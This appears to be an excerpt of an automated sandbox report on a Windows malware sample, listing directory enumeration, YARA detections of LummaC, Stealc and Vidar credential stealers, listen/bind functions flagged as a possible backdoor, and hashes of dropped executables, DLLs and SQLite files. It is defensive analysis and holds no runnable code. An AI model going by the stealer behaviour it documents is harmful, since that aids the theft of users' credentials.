Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe

Directory queried: number of queries: 2130

Yara detected Credential Stealer

Source: Yara match	File source: 10.3.e192e43b61.exe.1197b30.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000003.2624288449.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1786821317.0000000001774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2883370297.000000000111B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2623865515.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2663469865.00000000011A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1786888167.0000000001775000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2658010814.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2623816326.0000000001193000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1786861408.0000000001774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2605977580.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2608212064.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2639670507.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2663336618.00000000011A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2623503748.000000000118F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2809274914.0000000001403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: K7IHXYTNUQJPI2M9UU0ECLE1K.exe PID: 5460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e192e43b61.exe PID: 1420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e192e43b61.exe PID: 1340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e192e43b61.exe PID: 5744, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 7488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e192e43b61.exe PID: 1420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e192e43b61.exe PID: 1340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e192e43b61.exe PID: 5744, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 32.0.num.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.num.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.b0b9f39429.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.b0b9f39429.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.K7IHXYTNUQJPI2M9UU0ECLE1K.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000020.00000002.3015827110.000000000076E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2750222076.0000000000BA1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2901676931.0000000000BA1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2751119481.00000000018EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2580293430.0000000000821000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2582005430.000000000127E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.3019501243.0000000000861000.00000080.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.2852632926.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2709864138.0000000005560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000000.2857203948.0000000000861000.00000080.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2142029213.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2908035174.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: K7IHXYTNUQJPI2M9UU0ECLE1K.exe PID: 5460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: b0b9f39429.exe PID: 8148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: b0b9f39429.exe PID: 3916, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe, type: DROPPED
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: K7IHXYTNUQJPI2M9UU0ECLE1K.exe PID: 5460, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6F0C40 sqlite3_bind_zeroblob,	6_2_6C6F0C40
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6F0D60 sqlite3_bind_parameter_name,	6_2_6C6F0D60
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C618EA0 sqlite3_clear_bindings,	6_2_6C618EA0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6F0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	6_2_6C6F0B40
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C616410 bind,WSAGetLastError,	6_2_6C616410
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C616070 PR_Listen,	6_2_6C616070
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C61C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	6_2_6C61C050
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C61C030 sqlite3_bind_parameter_count,	6_2_6C61C030
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6160B0 listen,WSAGetLastError,	6_2_6C6160B0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5A22D0 sqlite3_bind_blob,	6_2_6C5A22D0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6163C0 PR_Bind,	6_2_6C6163C0

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1542670
Product:	CloudBasic
Start time:	05:53:07
Start date:	26.10.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	8d1e04c056caf2cc26a48a16be0198b8
SHA1:	f87723b046ab9db7acaa622516e3ba843650dce8
SHA256:	6b2b0c1fcb05eb6811e26b07df264a6a2becb83a95da2a875860c83e55776ff9
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\AKKFHDAK	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	28591AA4E12D1C4FC761BE7C0A468622	BC4968A84C19377D05A8BB3F208FBFAC49F4820B	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
C:\ProgramData\BFHJJJDAFBKEBGDGHCGD	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\FCFBGIDA	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2	780853CDDEAEE8DE70F28A4B255A600B	AD7A5DA33F7AD12946153C497E990720B09005ED	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
C:\ProgramData\FIECFBAAAFHIIDGCGCBF	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1	349E6EB110E34A08924D92F6B334801D	BDFB289DAFF51890CC71697B6322AA4B35EC9169	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
C:\ProgramData\GDHIIIIEHCFIECAKFHJDAFCBFC	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11	41EA9A4112F057AE6BA17E2838AEAC26	F2B389103BFD1A1A050C4857A995B09FEAFE8903	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
C:\ProgramData\GHJDHDAECBGCAKEBAEBAAKKKFH	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\IJEGDBGDBFIJKECBAKFBFIDGCF	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	C0FDF21AE11A6D1FA1201D502614B622	11724034A1CC915B061316A96E79E9DA6A00ADE8	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
C:\ProgramData\JJECGCBGDBKJJKEBFBFH	ASCII text, with very long lines (1809), with CRLF line terminators	5D8E5D85E880FB2D153275FCBE9DA6E5	72332A8A92B77A8B1E3AA00893D73FC2704B0D13	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
C:\ProgramData\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\ProgramData\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\ProgramData\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\ProgramData\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\ProgramData\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\ProgramData\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHMGC7TXSIK31JTC83MV8ND88A.exe.log	CSV text	3A8957C6382192B71471BD14359D0B12	71B96C965B65A051E7E7D10F61BEBD8CCBB88587	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	791FCEE57312D4A20CC86AE1CEA8DFC4	04A88C60AE1539A63411FE4765E9B931E8D2D992	27E4A3627D7DF2B22189DD4BEBC559AE1986D49A8F4E35980B428FADB66CF23D
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	3833A1B7C23D66EECEC6B16DDF5CF540	05182934E239A8E6715ADA16E0DDCDE3B7598E05	96F09E8BD3F67C287A0BB1529D5220D9496A233FBA5B1608366A2C280A864DD2
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	EE970780C371D5BD42992B92132F5014	47331BE4BF096C62689DF219BEA9FF4E168B5C31	F34BE318CE2ADF4BFC28A459A9DC6C468F72A8231AAA12845BEB68D58F0F5D80
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	8D1E04C056CAF2CC26A48A16BE0198B8	F87723B046AB9DB7ACAA622516E3BA843650DCE8	6B2B0C1FCB05EB6811E26B07DF264A6A2BECB83A95DA2A875860C83E55776FF9
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	PE32 executable (GUI) Intel 80386, for MS Windows	8D1E04C056CAF2CC26A48A16BE0198B8	F87723B046AB9DB7ACAA622516E3BA843650DCE8	6B2B0C1FCB05EB6811E26B07DF264A6A2BECB83A95DA2A875860C83E55776FF9
C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	PE32 executable (GUI) Intel 80386, for MS Windows	3833A1B7C23D66EECEC6B16DDF5CF540	05182934E239A8E6715ADA16E0DDCDE3B7598E05	96F09E8BD3F67C287A0BB1529D5220D9496A233FBA5B1608366A2C280A864DD2
C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	PE32 executable (GUI) Intel 80386, for MS Windows	EE970780C371D5BD42992B92132F5014	47331BE4BF096C62689DF219BEA9FF4E168B5C31	F34BE318CE2ADF4BFC28A459A9DC6C468F72A8231AAA12845BEB68D58F0F5D80
C:\Users\user\AppData\Local\Temp\1001608001\num.exe	PE32 executable (GUI) Intel 80386, for MS Windows	791FCEE57312D4A20CC86AE1CEA8DFC4	04A88C60AE1539A63411FE4765E9B931E8D2D992	27E4A3627D7DF2B22189DD4BEBC559AE1986D49A8F4E35980B428FADB66CF23D
